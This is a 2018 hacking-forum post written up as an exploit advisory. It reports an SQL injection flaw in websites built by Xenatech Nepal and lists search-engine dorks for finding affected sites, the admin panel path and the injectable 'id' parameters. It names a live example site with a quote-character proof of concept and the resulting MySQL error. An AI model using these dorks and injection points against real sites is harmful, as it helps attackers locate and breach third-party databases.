Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Powered by Xenatech Nepal Pvt. Ltd SQL Inj Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimiçi
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2734
Mesaj Sayısı: 6279
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Powered by Xenatech Nepal Pvt. Ltd SQL Inj Vuln
01.10.2018 12:33
################################################################################​#################

# Exploit Title : Powered by Xenatech Nepal Pvt. Ltd SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/10/2018
# Vendor Homepage : xenatechnepal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Description of the Product Xenatech Nepal Pvt. Ltd. Company :

Xenatech Nepal Pvt. Ltd. is SEO company in Nepal and website promotion company from Nepal.

They design professional websites at affordable price and take care of essential mobile friendly,
responsive web design elements like navigation, typography, usability, clarity and consistency.

Xenatech Nepal provides most affordable domain registration, Prompt customer support,
Expandable hosting packages, US based Server, Competitive Rates, Own control panel to setup email and other features,
Choice of NT and Linux platform, MS-SQL, MySQL, Oracle and MS-Access database support,
PHP, ASP, CGI, SSI, JSP, FrontPage support, since its establishment in 2009.

Xenatech Nepal is providing cost-effective, quality oriented, and reliable software services to clients across the globe.

Xenatech Nepal is the group of developers who are committed to provide quality services.

Xenatech Nepal is providing cost-effective, quality oriented, and reliable software services to clients across the globe.

################################################################################​#################

# Google Dork :

intext:''Powered by: Xenatech Nepal Pvt. Ltd'' site:np

intext:''© Copyright 2018. Xenatech Nepal Pvt. Ltd. All rights reserved.''

# Admin Panel Path :

/admin/

# SQL Injection Exploit :

/gallery.php?id=[SQL Injection]

/page.php?id=[SQL Injection]

################################################################################​#################

# Example Vulnerable Site => dhadingawaj.com.np/gallery.php?id=1%27 => [ Proof of Concept ] => archive.is/2Rz7v

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi